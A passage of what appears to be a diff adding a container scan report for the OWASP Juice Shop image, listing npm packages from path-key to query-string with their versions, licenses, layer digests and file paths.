"sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/path-key/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "path-parse@1.0.7", + "Name": "path-parse", + "Identifier": { + "PURL": "pkg:npm/path-parse@1.0.7", + "UID": "6d120dc17185e609" + }, + "Version": "1.0.7", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/path-parse/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "path-root@0.1.1", + "Name": "path-root", + "Identifier": { + "PURL": "pkg:npm/path-root@0.1.1", + "UID": "64a9940799a9da7d" + }, + "Version": "0.1.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/path-root/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "path-root-regex@0.1.2", + "Name": "path-root-regex", + "Identifier": { + "PURL": "pkg:npm/path-root-regex@0.1.2", + "UID": "ec116dae83873788" + }, + "Version": "0.1.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/path-root-regex/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "path-scurry@1.11.1", + "Name": "path-scurry", + "Identifier": { + "PURL": "pkg:npm/path-scurry@1.11.1", + "UID": "7e390cb181ab703d" + }, + "Version": "1.11.1", + "Licenses": [ + "BlueOak-1.0.0" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/path-scurry/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "path-to-regexp@0.1.13", + "Name": "path-to-regexp", + "Identifier": { + "PURL": "pkg:npm/path-to-regexp@0.1.13", + "UID": "faaf97cdf03e788c" + }, + "Version": "0.1.13", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/path-to-regexp/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "pdfkit@0.11.0", + "Name": "pdfkit", + "Identifier": { + "PURL": "pkg:npm/pdfkit@0.11.0", + "UID": "4910d47eb3a6f088" + }, + "Version": "0.11.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/pdfkit/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "peek-readable@4.1.0", + "Name": "peek-readable", + "Identifier": { + "PURL": "pkg:npm/peek-readable@4.1.0", + "UID": "7ea3d5f707c7ff28" + }, + "Version": "4.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/peek-readable/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "pend@1.2.0", + "Name": "pend", + "Identifier": { + "PURL": "pkg:npm/pend@1.2.0", + "UID": "256cb541c515ff44" + }, + "Version": "1.2.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/pend/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "pg-connection-string@2.12.0", + "Name": "pg-connection-string", + "Identifier": { + "PURL": "pkg:npm/pg-connection-string@2.12.0", + "UID": "d88b302ba90197a6" + }, + "Version": "2.12.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/pg-connection-string/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "picocolors@1.1.1", + "Name": "picocolors", + "Identifier": { + "PURL": "pkg:npm/picocolors@1.1.1", + "UID": "9339bbd6c608b389" + }, + "Version": "1.1.1", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/picocolors/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "picomatch@2.3.2", + "Name": "picomatch", + "Identifier": { + "PURL": "pkg:npm/picomatch@2.3.2", + "UID": "afacf14a765fe959" + }, + "Version": "2.3.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/picomatch/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "picomatch@4.0.4", + "Name": "picomatch", + "Identifier": { + "PURL": "pkg:npm/picomatch@4.0.4", + "UID": "4caae5dd9dc2c3ae" + }, + "Version": "4.0.4", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/tinyglobby/node_modules/picomatch/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "pify@2.3.0", + "Name": "pify", + "Identifier": { + "PURL": "pkg:npm/pify@2.3.0", + "UID": "2e6f05ee2ccdd2cc" + }, + "Version": "2.3.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/decompress-unzip/node_modules/pify/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "pify@2.3.0", + "Name": "pify", + "Identifier": { + "PURL": "pkg:npm/pify@2.3.0", + "UID": "60ef02d1d77d8a57" + }, + "Version": "2.3.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/decompress/node_modules/pify/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "pify@3.0.0", + "Name": "pify", + "Identifier": { + "PURL": "pkg:npm/pify@3.0.0", + "UID": "1dd6ad6a1b5a5ccb" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/decompress/node_modules/make-dir/node_modules/pify/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "pify@3.0.0", + "Name": "pify", + "Identifier": { + "PURL": "pkg:npm/pify@3.0.0", + "UID": "6135cea8764b299a" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/got/node_modules/pify/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "pify@4.0.1", + "Name": "pify", + "Identifier": { + "PURL": "pkg:npm/pify@4.0.1", + "UID": "fe82804dc37cf657" + }, + "Version": "4.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/pify/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "pinkie@2.0.4", + "Name": "pinkie", + "Identifier": { + "PURL": "pkg:npm/pinkie@2.0.4", + "UID": "f0c46b6a6ee1cc27" + }, + "Version": "2.0.4", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/pinkie/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "pinkie-promise@2.0.1", + "Name": "pinkie-promise", + "Identifier": { + "PURL": "pkg:npm/pinkie-promise@2.0.1", + "UID": "5413e008c2453028" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/pinkie-promise/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "png-js@1.1.0", + "Name": "png-js", + "Identifier": { + "PURL": "pkg:npm/png-js@1.1.0", + "UID": "9c7c479b3a30dc79" + }, + "Version": "1.1.0", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/png-js/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "portscanner@2.2.0", + "Name": "portscanner", + "Identifier": { + "PURL": "pkg:npm/portscanner@2.2.0", + "UID": "864ba902b5d94c3c" + }, + "Version": "2.2.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/portscanner/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "possible-typed-array-names@1.1.0", + "Name": "possible-typed-array-names", + "Identifier": { + "PURL": "pkg:npm/possible-typed-array-names@1.1.0", + "UID": "9a833aa7b4d9d574" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/possible-typed-array-names/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "prebuild-install@5.3.6", + "Name": "prebuild-install", + "Identifier": { + "PURL": "pkg:npm/prebuild-install@5.3.6", + "UID": "378b55c40607e8f0" + }, + "Version": "5.3.6", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/prebuild-install/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "prebuild-install@7.1.3", + "Name": "prebuild-install", + "Identifier": { + "PURL": "pkg:npm/prebuild-install@7.1.3", + "UID": "efd14a96cc2278d8" + }, + "Version": "7.1.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/libxmljs2/node_modules/prebuild-install/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "prebuild-install@7.1.3", + "Name": "prebuild-install", + "Identifier": { + "PURL": "pkg:npm/prebuild-install@7.1.3", + "UID": "9ce518a6bb6beb08" + }, + "Version": "7.1.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sqlite3/node_modules/prebuild-install/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "prepend-http@2.0.0", + "Name": "prepend-http", + "Identifier": { + "PURL": "pkg:npm/prepend-http@2.0.0", + "UID": "4f11313105b09d7" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/prepend-http/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "pretty-bytes@4.0.2", + "Name": "pretty-bytes", + "Identifier": { + "PURL": "pkg:npm/pretty-bytes@4.0.2", + "UID": "766e9f955ee45b9f" + }, + "Version": "4.0.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/grunt-contrib-compress/node_modules/pretty-bytes/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "proc-log@5.0.0", + "Name": "proc-log", + "Identifier": { + "PURL": "pkg:npm/proc-log@5.0.0", + "UID": "8c89d2e9bb624101" + }, + "Version": "5.0.0", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/proc-log/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "process@0.11.10", + "Name": "process", + "Identifier": { + "PURL": "pkg:npm/process@0.11.10", + "UID": "f89125e85a09c691" + }, + "Version": "0.11.10", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/process/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "process-nextick-args@2.0.1", + "Name": "process-nextick-args", + "Identifier": { + "PURL": "pkg:npm/process-nextick-args@2.0.1", + "UID": "212174090fa6eec4" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/process-nextick-args/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "prom-client@15.1.3", + "Name": "prom-client", + "Identifier": { + "PURL": "pkg:npm/prom-client@15.1.3", + "UID": "1b26afe84a71f93a" + }, + "Version": "15.1.3", + "Licenses": [ + "Apache-2.0" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/prom-client/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "promise@7.3.1", + "Name": "promise", + "Identifier": { + "PURL": "pkg:npm/promise@7.3.1", + "UID": "4230436bbe52605a" + }, + "Version": "7.3.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/promise/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "promise-inflight@1.0.1", + "Name": "promise-inflight", + "Identifier": { + "PURL": "pkg:npm/promise-inflight@1.0.1", + "UID": "ce9b424a9e5c7b17" + }, + "Version": "1.0.1", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/promise-inflight/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "promise-retry@2.0.1", + "Name": "promise-retry", + "Identifier": { + "PURL": "pkg:npm/promise-retry@2.0.1", + "UID": "e3c4c70c2da25c8b" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/promise-retry/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "proxy-addr@2.0.7", + "Name": "proxy-addr", + "Identifier": { + "PURL": "pkg:npm/proxy-addr@2.0.7", + "UID": "53a24917c697ca71" + }, + "Version": "2.0.7", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/proxy-addr/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "pug@3.0.4", + "Name": "pug", + "Identifier": { + "PURL": "pkg:npm/pug@3.0.4", + "UID": "ffa8d9374799ec2f" + }, + "Version": "3.0.4", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/pug/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "pug-attrs@3.0.0", + "Name": "pug-attrs", + "Identifier": { + "PURL": "pkg:npm/pug-attrs@3.0.0", + "UID": "1bb7227297af4f5" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/pug-attrs/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "pug-code-gen@3.0.4", + "Name": "pug-code-gen", + "Identifier": { + "PURL": "pkg:npm/pug-code-gen@3.0.4", + "UID": "9745e234708e9754" + }, + "Version": "3.0.4", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/pug-code-gen/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "pug-error@2.1.0", + "Name": "pug-error", + "Identifier": { + "PURL": "pkg:npm/pug-error@2.1.0", + "UID": "4910c8474b12634e" + }, + "Version": "2.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/pug-error/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "pug-filters@4.0.0", + "Name": "pug-filters", + "Identifier": { + "PURL": "pkg:npm/pug-filters@4.0.0", + "UID": "d4a6cd70cdcc30cc" + }, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/pug-filters/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "pug-lexer@5.0.1", + "Name": "pug-lexer", + "Identifier": { + "PURL": "pkg:npm/pug-lexer@5.0.1", + "UID": "4fbe129550d06b76" + }, + "Version": "5.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/pug-lexer/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "pug-linker@4.0.0", + "Name": "pug-linker", + "Identifier": { + "PURL": "pkg:npm/pug-linker@4.0.0", + "UID": "ef1aee15d1376581" + }, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/pug-linker/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "pug-load@3.0.0", + "Name": "pug-load", + "Identifier": { + "PURL": "pkg:npm/pug-load@3.0.0", + "UID": "1098e7c9ca583873" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/pug-load/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "pug-parser@6.0.0", + "Name": "pug-parser", + "Identifier": { + "PURL": "pkg:npm/pug-parser@6.0.0", + "UID": "e3f9bf0f65489546" + }, + "Version": "6.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/pug-parser/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "pug-runtime@3.0.1", + "Name": "pug-runtime", + "Identifier": { + "PURL": "pkg:npm/pug-runtime@3.0.1", + "UID": "6f355c1c6ef64cff" + }, + "Version": "3.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/pug-runtime/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "pug-strip-comments@2.0.0", + "Name": "pug-strip-comments", + "Identifier": { + "PURL": "pkg:npm/pug-strip-comments@2.0.0", + "UID": "e99ff8b06aa1a82" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/pug-strip-comments/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "pug-walk@2.0.0", + "Name": "pug-walk", + "Identifier": { + "PURL": "pkg:npm/pug-walk@2.0.0", + "UID": "6752f1726c4735e3" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/pug-walk/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "pump@3.0.4", + "Name": "pump", + "Identifier": { + "PURL": "pkg:npm/pump@3.0.4", + "UID": "cad21921772bf2ae" + }, + "Version": "3.0.4", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/pump/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "qs@6.15.1", + "Name": "qs", + "Identifier": { + "PURL": "pkg:npm/qs@6.15.1", + "UID": "bfeeb87c151ea063" + }, + "Version": "6.15.1", + "Licenses": [ + "BSD-3-Clause" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/qs/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "query-string@5.1.1", + "Name": "query-string", + "Identifier": { + "PURL": "pkg:npm/query-string@5.1.1", + "UID": "b45132d72375c3b9" + }, + "Version": "5.1.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/query-string/package.json", + 